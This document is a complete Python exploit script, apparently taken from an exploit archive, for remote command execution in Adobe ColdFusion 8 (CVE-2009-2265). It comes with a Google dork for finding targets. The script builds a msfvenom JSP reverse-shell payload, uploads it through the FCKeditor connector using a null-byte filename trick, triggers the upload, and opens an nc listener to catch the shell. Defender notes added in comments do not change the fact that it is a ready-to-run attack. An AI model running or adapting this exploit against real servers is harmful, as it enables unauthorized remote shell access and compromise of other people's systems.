## https://sploitus.com/exploit?id=PACKETSTORM:163271
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)  
# Google Dork: intext:"adobe coldfusion 8"  
# Date: 24/06/2021  
# Exploit Author: Pergyz  
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html  
# Version: 8  
# Tested on: Microsoft Windows Server 2008 R2 Standard  
# CVE : CVE-2009-2265  
  
#!/usr/bin/python3  
  
from multiprocessing import Process  
import io  
import mimetypes  
import os  
import urllib.request  
import uuid  
  
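class MultiPartForm:
    """Accumulate file parts and serialise them as a multipart/form-data body.

    Each part is stored as ``(fieldname, filename, mimetype, body)`` in
    ``self.files``; ``bytes(form)`` renders the parts separated by a random
    boundary chosen when the form is created.

    The field name and filename are caller-supplied strings that end up inside
    a quoted header parameter. They are percent-escaped before being written
    so that a double quote or a line break in either value cannot terminate
    the parameter or start an extra header line in the part.
    """

    def __init__(self):
        self.files = []
        # Random per-form boundary, kept as bytes because the body is bytes.
        self.boundary = uuid.uuid4().hex.encode('utf-8')

    def get_content_type(self):
        """Return the Content-Type header value that matches this form's boundary."""
        return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))

    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        """Read ``fileHandle`` to the end and queue its content as one file part.

        Args:
            fieldname: form field name used in the part's Content-Disposition.
            filename: filename advertised in the part's Content-Disposition.
            fileHandle: object with a ``read()`` method returning bytes. It is
                read but not closed here; closing stays with the caller.
            mimetype: Content-Type of the part. When omitted it is guessed from
                ``filename``, falling back to ``application/octet-stream``.

        Raises:
            ValueError: if ``mimetype`` contains a carriage return or line
                feed, which would otherwise add a header line to the part.
        """
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'

        # The MIME type is written verbatim into a header line, so a line break
        # in it is rejected before anything is read from the handle.
        if '\r' in mimetype or '\n' in mimetype:
            raise ValueError('mimetype must not contain CR or LF')

        body = fileHandle.read()
        self.files.append((fieldname, filename, mimetype, body))

    @staticmethod
    def _quote_param(value):
        """Escape CR, LF and the double quote for use inside a quoted parameter."""
        return value.replace('\r', '%0D').replace('\n', '%0A').replace('"', '%22')

    @staticmethod
    def _attached_file(name, filename):
        """Return the encoded Content-Disposition header line of a file part."""
        safe_name = MultiPartForm._quote_param(name)
        safe_filename = MultiPartForm._quote_param(filename)
        line = f'Content-Disposition: form-data; name="{safe_name}"; filename="{safe_filename}"\r\n'
        return line.encode('utf-8')

    @staticmethod
    def _content_type(ct):
        """Return the encoded Content-Type header line of a file part."""
        return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')

    def __bytes__(self):
        """Render every queued part followed by the closing boundary."""
        buffer = io.BytesIO()
        boundary = b'--' + self.boundary + b'\r\n'

        for f_name, filename, f_content_type, body in self.files:
            buffer.write(boundary)
            buffer.write(self._attached_file(f_name, filename))
            buffer.write(self._content_type(f_content_type))
            buffer.write(b'\r\n')  # blank line separating part headers from content
            buffer.write(body)
            buffer.write(b'\r\n')

        # Closing delimiter: the boundary with a trailing "--".
        buffer.write(b'--' + self.boundary + b'--\r\n')
        return buffer.getvalue()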
  
def execute_payload():
    """Fetch the uploaded JSP over HTTP and print the decoded response body.

    Reads the module-level ``rhost``, ``rport`` and ``filename`` values.
    Defender note: on the server side this is a GET for a ``.jsp`` file under
    ``/userfiles/file/``, a directory meant for user uploads; a request of
    that shape in the access log is worth alerting on.
    """
    print('\nExecuting the payload...')
    target_url = f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp'
    response = urllib.request.urlopen(target_url)
    print(response.read().decode('utf-8'))
  
def listen_connection():
    """Run a netcat listener on the module-level ``lport`` via the shell.

    The call blocks until the ``nc`` process exits.
    """
    print('\nListening for connection...')
    listener_command = f'nc -nlvp {lport}'
    os.system(listener_command)
  
if __name__ == '__main__':
    # Hard-coded addressing. Both hosts are in private 10.0.0.0/8 space, i.e. the
    # values describe the author's own test network, not an Internet target.
    lhost = '10.10.16.4'
    lport = 4444
    rhost = "10.10.10.11"
    rport = 8500
    filename = uuid.uuid4().hex

    # Build the JSP file locally with msfvenom; it is written to <hex>.jsp.
    print("\nGenerating a payload...")
    generate_command = f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp'
    os.system(generate_command)

    # Wrap the file in a multipart body. Note the mismatch that defines
    # CVE-2009-2265 as used here: the form part is named <hex>.txt, while the
    # CurrentFolder query parameter below carries <hex>.jsp followed by an
    # encoded NUL (%00). The script later requests /userfiles/file/<hex>.jsp,
    # so the server evidently stores the upload under the .jsp name.
    form = MultiPartForm()
    form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))
    data = bytes(form)

    # Passing data makes urllib send a POST to the FCKeditor cfm upload connector.
    # Defender note: a POST to this connector path whose CurrentFolder value
    # contains %00 is a high-signal log indicator. Remediation is the vendor fix
    # for CVE-2009-2265, or removing / restricting access to the bundled
    # FCKeditor connectors (confirm specifics against the vendor advisory).
    upload_url = f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00'
    request = urllib.request.Request(upload_url, data=data)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Content-length', len(data))

    # Dump the outgoing request headers and body for inspection.
    print('\nPriting request...')

    for header_name, header_value in request.header_items():
        print('{}: {}'.format(header_name, header_value))

    print('\n' + request.data.decode('utf-8'))

    # Send the upload and show what the connector answered.
    print('\nSending request and printing response...')
    upload_response = urllib.request.urlopen(request)
    print(upload_response.read().decode('utf-8'))

    # Echo the settings used for this run.
    print('\nPrinting some information for debugging...')
    for label, setting in (('lhost', lhost), ('lport', lport), ('rhost', rhost), ('rport', rport)):
        print(f'{label}: {setting}')
    print(f'payload: {filename}.jsp')

    # Remove the local copy of the generated file.
    print("\nDeleting the payload...")
    os.system(f'rm {filename}.jsp')

    # Start the listener and the HTTP fetch in separate processes, then wait
    # for both to finish.
    p1 = Process(target=listen_connection)
    p1.start()
    p2 = Process(target=execute_payload)
    p2.start()
    for worker in (p1, p2):
        worker.join()